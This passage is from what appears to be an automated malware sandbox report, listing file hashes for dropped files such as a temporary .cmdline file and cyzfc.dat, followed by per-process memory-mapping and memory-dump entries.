171a88ab4fad87acfd2e5032eb0c6113
SHA1754de0e7656c558d335710fc41cbf196d39c1a19
SHA2565473b5550a65171ee7d5977d673c97e41e9ec16fad10ec5ab8aa3b7c798577a6
SHA51287ef6ac53a00d21f2df4d81ec5956861a4b539b10f5855345aa068c0d9d971f3329477e485471eb40b9eeea59f01fd3c42c4ab2f25e71d825cbf3586be0206b8
-
\??\c:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.cmdlineMD5
763b35b76bfc8ae659da5095ed42d98a
SHA1e451a7a9847739bb59c5c54439b7254f29287b14
SHA256a461f368bddef81fddda3f0247b7a4e462827aaec3121ed66f251d11c02b3b3b
SHA51242e3128b5287583a2a45de1832891ee40e3ccc2391656e315438f89d4fce048f429e40e8dd2654855b9d3bc6854bb077b80e192bebae9d56ced0047a5ed6724a
-
\Users\Admin\AppData\Local\cyzfc.datMD5
16bbc967a8b6a365871a05c74a4f345b
SHA19858d5cb2a6614be3c48e33911bf9f7978b441bf
SHA256b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
SHA51268c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
-
memory/504-9-0x0000000000000000-mapping.dmp
-
memory/504-46-0x00000000778B2000-0x00000000778B200C-memory.dmpFilesize
12B
-
memory/504-47-0x0000000000000000-mapping.dmp
-
memory/720-32-0x00000000778B2000-0x00000000778B200C-memory.dmpFilesize
12B
-
memory/720-34-0x0000000000000000-mapping.dmp
-
memory/864-29-0x0000000000000000-mapping.dmp
-
memory/864-6-0x0000000000000000-mapping.dmp
-
memory/1452-17-0x0000000000000000-mapping.dmp
-
memory/2004-50-0x0000000000000000-mapping.dmp
-
memory/2004-49-0x00000000778B2000-0x00000000778B200C-memory.dmpFilesize
12B
-
memory/2820-31-0x0000000000000000-mapping.dmp
-
memory/2820-30-0x00000000778B2000-0x00000000778B200C-memory.dmpFilesize
12B
-
memory/2912-14-0x0000000000000000-mapping.dmp
-
memory/3224-22-0x0000000000000000-mapping.dmp
-
memory/3280-28-0x0000023196660000-0x00000231966DE000-memory.dmpFilesize
504KB
-
memory/3280-27-0x0000023196620000-0x0000023196660000-memory.dmpFilesize
256KB
-
memory/3280-23-0x0000000000000000-mapping.dmp
-
memory/3712-13-0x000001DA50540000-0x000001DA50541000-memory.dmpFilesize
4KB
-
memory/3712-2-0x0000000000000000-mapping.dmp
-
memory/3712-4-0x000001DA357E0000-0x000001DA357E1000-memory.dmpFilesize
4KB
-
memory/3712-3-0x00007FFE217B0000-0x00007FFE2219C000-memory.dmpFilesize
9.9MB
-
memory/3712-5-0x000001DA505C0000-0x000001DA505C1000-memory.dmpFilesize
4KB
-
memory/3712-21-0x000001DA50550000-0x000001DA50551000-memory.dmpFilesize
4KB
-
memory/3804-38-0x00000000778B2000-0x00000000778B200C-memory.dmpFilesize
12B
-
memory/3804-39-0x0000000000000000-mapping.dmp
-
memory/3948-44-0x0000000000000000-mapping.dmp
-
memory/3948-43-0x00000000778B2000-0x00000000778B200C-memory.dmpFilesize
12B